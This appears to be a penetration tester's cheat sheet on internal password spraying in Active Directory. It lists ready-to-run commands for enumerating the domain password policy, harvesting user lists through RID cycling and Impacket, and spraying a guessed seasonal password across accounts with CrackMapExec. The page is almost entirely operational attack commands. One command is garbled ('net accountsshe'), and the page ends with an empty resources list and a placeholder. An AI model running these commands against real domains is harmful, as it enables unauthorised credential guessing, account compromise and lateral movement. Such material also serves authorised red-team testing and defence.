Secondary Categories: 02-Credential Access, 02-Lateral Movement, 02-Privilege Escalation

When conducting internal password spraying it is important to keep in mind that this action is very loud. I also highly recommend to enumerate the domain’s password policy before beginning.

Password Policy

Enumerate Password Policy

# Get Password Policy with CrackMapExec (Unauthenticated)
cme smb $dc -u '' -p ''
 
# Get Password Policy with CrackMapExec
crackmapexec smb $dc -u $username -p $password --pass-pol
 
# Get Password Policy with Net Accounts
net accountsshe
 
# Enumerate the default password policy settings from the Default Domain Policy GPO
Get-ADDefaultDomainPasswordPolicy

Fine-Grained Password Policy

# Enumerate all FGPPs configured
Get-ADFineGrainedPasswordPolicy -Filter *
 
# Obtain the FGPP assigned to a specific user
Get-ADUserResultantPasswordPolicy -Identity JSmith

Gathering Domain Users

Once you have enumerated the password policy if you don’t already have a list of all domain users I recommend gathering this information next.

# Get List of Users with CrackMapExec via RID Cycling (Unauthenticated)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups
 
# Get List of Users with CrackMapExec via RID Cycling
crackmapexec smb $dc -u $username -p $password --users
 
# Get List of Users with Impacket
impacket-GetADUsers $domain/$username:$password -all -dc-ip $dc

Spraying

# Spray with CrackMapExec
crackmapexec smb $ip -u $username_list -p Winter2022! --continue-on-success

Resources:

Also Check Out:

  • PLACEHOLDER